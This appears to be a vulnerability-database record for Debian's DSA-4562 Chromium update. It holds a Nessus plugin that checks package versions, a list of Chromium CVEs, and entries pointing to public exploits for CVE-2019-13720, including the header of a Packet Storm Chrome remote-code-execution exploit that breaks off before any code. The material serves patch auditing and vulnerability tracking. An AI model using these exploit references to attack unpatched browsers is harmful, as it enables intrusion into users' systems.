Sheets.\n\n - CVE-2019-13715 xisigr discovered a URL spoofing issue.\n\n - CVE-2019-13716 Barron Hagerman discovered an error in the service worker implementation.\n\n - CVE-2019-13717 xisigr discovered a user interface spoofing issue.\n\n - CVE-2019-13718 Khalil Zhani discovered a way to spoof Internationalized Domain Names.\n\n - CVE-2019-13719 Khalil Zhani discovered a user interface spoofing issue.\n\n - CVE-2019-13720 Anton Ivanov and Alexey Kulaev discovered a use-after-free issue.\n\n - CVE-2019-13721 banananapenguin discovered a use-after-free issue in the pdfium library.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-11-12T00:00:00", "type": "nessus", "title": "Debian DSA-4562-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", "CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13685", "CVE-2019-13686", "CVE-2019-13687", "CVE-2019-13688", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13693", "CVE-2019-13694", "CVE-2019-13695", "CVE-2019-13696", "CVE-2019-13697", "CVE-2019-13699", "CVE-2019-13700", "CVE-2019-13701", "CVE-2019-13702", "CVE-2019-13703", "CVE-2019-13704", "CVE-2019-13705", "CVE-2019-13706", "CVE-2019-13707", "CVE-2019-13708", "CVE-2019-13709", "CVE-2019-13710", "CVE-2019-13711", "CVE-2019-13713", "CVE-2019-13714", "CVE-2019-13715", "CVE-2019-13716", "CVE-2019-13717", "CVE-2019-13718", "CVE-2019-13719", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5869", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4562.NASL", "href": "https://www.tenable.com/plugins/nessus/130774", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4562. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(130774);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", \"CVE-2019-13668\", \"CVE-2019-13669\", \"CVE-2019-13670\", \"CVE-2019-13671\", \"CVE-2019-13673\", \"CVE-2019-13674\", \"CVE-2019-13675\", \"CVE-2019-13676\", \"CVE-2019-13677\", \"CVE-2019-13678\", \"CVE-2019-13679\", \"CVE-2019-13680\", \"CVE-2019-13681\", \"CVE-2019-13682\", \"CVE-2019-13683\", \"CVE-2019-13685\", \"CVE-2019-13686\", \"CVE-2019-13687\", \"CVE-2019-13688\", \"CVE-2019-13691\", \"CVE-2019-13692\", \"CVE-2019-13693\", \"CVE-2019-13694\", \"CVE-2019-13695\", \"CVE-2019-13696\", \"CVE-2019-13697\", \"CVE-2019-13699\", \"CVE-2019-13700\", \"CVE-2019-13701\", \"CVE-2019-13702\", \"CVE-2019-13703\", \"CVE-2019-13704\", \"CVE-2019-13705\", \"CVE-2019-13706\", \"CVE-2019-13707\", \"CVE-2019-13708\", \"CVE-2019-13709\", \"CVE-2019-13710\", \"CVE-2019-13711\", \"CVE-2019-13713\", \"CVE-2019-13714\", \"CVE-2019-13715\", \"CVE-2019-13716\", \"CVE-2019-13717\", \"CVE-2019-13718\", \"CVE-2019-13719\", \"CVE-2019-13720\", \"CVE-2019-13721\", \"CVE-2019-5869\", \"CVE-2019-5870\", \"CVE-2019-5871\", \"CVE-2019-5872\", \"CVE-2019-5874\", \"CVE-2019-5875\", \"CVE-2019-5876\", \"CVE-2019-5877\", \"CVE-2019-5878\", \"CVE-2019-5879\", \"CVE-2019-5880\");\n script_xref(name:\"DSA\", value:\"4562\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0698\");\n\n script_name(english:\"Debian DSA-4562-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2019-5869\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5870\n Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-5871\n A buffer overflow issue was discovered in the skia\n library.\n\n - CVE-2019-5872\n Zhe Jin discovered a use-after-free issue.\n\n - CVE-2019-5874\n James Lee discovered an issue with external Uniform\n Resource Identifiers.\n\n - CVE-2019-5875\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-5876\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-5877\n Guang Gong discovered an out-of-bounds read issue.\n\n - CVE-2019-5878\n Guang Gong discovered an use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2019-5879\n Jinseo Kim discover that extensions could read files on\n the local system.\n\n - CVE-2019-5880\n Jun Kokatsu discovered a way to bypass the SameSite\n cookie feature.\n\n - CVE-2019-13659\n Lnyas Zhang discovered a URL spoofing issue.\n\n - CVE-2019-13660\n Wenxu Wu discovered a user interface error in full\n screen mode.\n\n - CVE-2019-13661\n Wenxu Wu discovered a user interface spoofing issue in\n full screen mode.\n\n - CVE-2019-13662\n David Erceg discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2019-13663\n Lnyas Zhang discovered a way to spoof Internationalized\n Domain Names.\n\n - CVE-2019-13664\n Thomas Shadwell discovered a way to bypass the SameSite\n cookie feature.\n\n - CVE-2019-13665\n Jun Kokatsu discovered a way to bypass the multiple file\n download protection feature.\n\n - CVE-2019-13666\n Tom Van Goethem discovered an information leak.\n\n - CVE-2019-13667\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13668\n David Erceg discovered an information leak.\n\n - CVE-2019-13669\n Khalil Zhani discovered an authentication spoofing\n issue.\n\n - CVE-2019-13670\n Guang Gong discovered a memory corruption issue in the\n v8 JavaScript library.\n\n - CVE-2019-13671\n xisigr discovered a user interface error.\n\n - CVE-2019-13673\n David Erceg discovered an information leak.\n\n - CVE-2019-13674\n Khalil Zhani discovered a way to spoof Internationalized\n Domain Names.\n\n - CVE-2019-13675\n Jun Kokatsu discovered a way to disable extensions.\n\n - CVE-2019-13676\n Wenxu Wu discovered an error in a certificate warning.\n\n - CVE-2019-13677\n Jun Kokatsu discovered an error in the chrome web store.\n\n - CVE-2019-13678\n Ronni Skansing discovered a spoofing issue in the\n download dialog window.\n\n - CVE-2019-13679\n Conrad Irwin discovered that user activation was not\n required for printing.\n\n - CVE-2019-13680\n Thijs Alkamade discovered an IP address spoofing issue.\n\n - CVE-2019-13681\n David Erceg discovered a way to bypass download\n restrictions.\n\n - CVE-2019-13682\n Jun Kokatsu discovered a way to bypass the site\n isolation feature.\n\n - CVE-2019-13683\n David Erceg discovered an information leak.\n\n - CVE-2019-13685\n Khalil Zhani discovered a use-after-free issue.\n\n - CVE-2019-13686\n Brendon discovered a use-after-free issue.\n\n - CVE-2019-13687\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13688\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13691\n David Erceg discovered a user interface spoofing issue.\n\n - CVE-2019-13692\n Jun Kokatsu discovered a way to bypass the Same Origin\n Policy.\n\n - CVE-2019-13693\n Guang Gong discovered a use-after-free issue.\n\n - CVE-2019-13694\n banananapenguin discovered a use-after-free issue.\n\n - CVE-2019-13695\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13696\n Guang Gong discovered a use-after-free issue in the v8\n JavaScript library.\n\n - CVE-2019-13697\n Luan Herrera discovered an information leak.\n\n - CVE-2019-13699\n Man Yue Mo discovered a use-after-free issue.\n\n - CVE-2019-13700\n Man Yue Mo discovered a buffer overflow issue.\n\n - CVE-2019-13701\n David Erceg discovered a URL spoofing issue.\n\n - CVE-2019-13702\n Phillip Langlois and Edward Torkington discovered a\n privilege escalation issue in the installer.\n\n - CVE-2019-13703\n Khalil Zhani discovered a URL spoofing issue.\n\n - CVE-2019-13704\n Jun Kokatsu discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2019-13705\n Luan Herrera discovered a way to bypass extension\n permissions.\n\n - CVE-2019-13706\n pdknsk discovered an out-of-bounds read issue in the\n pdfium library.\n\n - CVE-2019-13707\n Andrea Palazzo discovered an information leak.\n\n - CVE-2019-13708\n Khalil Zhani discovered an authentication spoofing\n issue.\n\n - CVE-2019-13709\n Zhong Zhaochen discovered a way to bypass download\n restrictions.\n\n - CVE-2019-13710\n bernardo.mrod discovered a way to bypass download\n restrictions.\n\n - CVE-2019-13711\n David Erceg discovered an information leak.\n\n - CVE-2019-13713\n David Erceg discovered an information leak.\n\n - CVE-2019-13714\n Jun Kokatsu discovered an issue with Cascading Style\n Sheets.\n\n - CVE-2019-13715\n xisigr discovered a URL spoofing issue.\n\n - CVE-2019-13716\n Barron Hagerman discovered an error in the service\n worker implementation.\n\n - CVE-2019-13717\n xisigr discovered a user interface spoofing issue.\n\n - CVE-2019-13718\n Khalil Zhani discovered a way to spoof Internationalized\n Domain Names.\n\n - CVE-2019-13719\n Khalil Zhani discovered a user interface spoofing issue.\n\n - CVE-2019-13720\n Anton Ivanov and Alexey Kulaev discovered a\n use-after-free issue.\n\n - CVE-2019-13721\n banananapenguin discovered a use-after-free issue in the\n pdfium library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5874\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5876\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5878\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-5880\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13659\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13660\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13662\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13663\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13666\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13667\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13668\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13671\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13674\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13675\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13676\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13677\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13679\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13680\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13681\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13682\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13683\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13685\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13691\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13692\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13694\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13699\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13700\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13701\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13703\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13704\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13714\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13717\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2019-13721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4562\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the oldstable distribution (stretch), support for chromium has\nbeen discontinued. Please upgrade to the stable release (buster) to\ncontinue receiving chromium updates or switch to firefox, which\ncontinues to be supported in the oldstable release.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 78.0.3904.97-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5878\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"78.0.3904.97-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-03-23T22:33:18", "description": "# cve-2019-13720\n\nCVE-2019-13720 E...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-04T12:40:28", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2021-12-05T22:15:46", "id": "B8E18FAC-F86B-5BA2-9E5B-D9FA2576FED9", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:04:26", "description": "# CVE-2019-13720(a.k.a WizardOpium) PoC\nwork chrom...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-21T16:21:16", "type": "githubexploit", "title": "Exploit for Out-of-bounds Write in Google Chrome", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2021-12-05T22:15:54", "id": "CDF24E57-44DE-5297-B49D-D4E0AEE3F0AB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "redhatcve": [{"lastseen": "2022-07-09T18:39:55", "description": "Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2019-11-04T18:56:15", "type": "redhatcve", "title": "CVE-2019-13720", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-07-09T17:08:53", "id": "RH:CVE-2019-13720", "href": "https://access.redhat.com/security/cve/cve-2019-13720", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2022-05-11T17:26:37", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-11T00:00:00", "type": "packetstorm", "title": "Google Chrome 78.0.3904.70 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720"], "modified": "2022-05-11T00:00:00", "id": "PACKETSTORM:167066", "href": "https://packetstormsecurity.com/files/167066/Google-Chrome-78.0.3904.70-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution \n# Date: 2022-05-03 \n# Exploit Author: deadlock (Forrest Orr) \n# Type: RCE \n# Platform: Windows \n# Website: https://forrest-orr.net \n# Twitter: https://twitter.com/_ForrestOrr \n# Vendor Homepage: https://www.google.com/chrome/ \n# Software Link: https://github.com/forrest-orr/WizardOpium/blob/main/Google_Chrome_Portable_64bit_v76.0.3809.132.zip \n# Versions: Chrome 76 - 78.0.3904.70 \n# Tested on: Chrome 76.0.3809.132 Official Build 64-bit on Windows 